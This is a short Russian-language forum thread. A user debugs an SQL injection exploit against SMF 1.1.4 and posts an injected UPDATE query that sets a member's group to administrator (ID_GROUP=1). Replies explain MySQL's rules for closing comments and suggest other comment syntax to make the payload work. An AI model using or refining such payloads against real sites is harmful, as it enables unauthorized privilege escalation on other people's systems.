Форум АНТИЧАТ - [MySQL] Ошибка синтаксиса в закомментированной фразе

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

[MySQL] Ошибка синтаксиса в закомментированной фразе

Здравствуйте. Тестирую эксплоит для SMF 1.1.4 (SQL-inj) и при проведении инъекции получаю вот такой запрос.

Код:

UPDATE smf_members

SET

messageLabels = 'one',ID_GROUP=1 WHERE/*,*/ID_MEMBER=2/*'

WHERE ID_MEMBER = 2

LIMIT 1

По идее, нижний текст является закомментированным т.к. перед ним идёт /*. но MySQL выдаёт ошибку

Цитата:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*'
WHERE ID_MEMBER = 2
LIMIT 1

в чём здесь проблема? Уже час не могу понять. Может дело в каких-нибудь настройках MySQL?

MySQL ругается на '/*', попробуй использовать другой комментарий в конце, например '--+', начиная с версии 5.0.51 комментарий '/*' нельзя оставлять открытым.

В версиях MySQL от 5.0.50 и 5.1.23 включительно требуется закрывать комментарий, иначе это вызовет ошибку синтаксиса.

да вот только -- как и # комментирует все до конца текущей строки, а тут многострочный запрос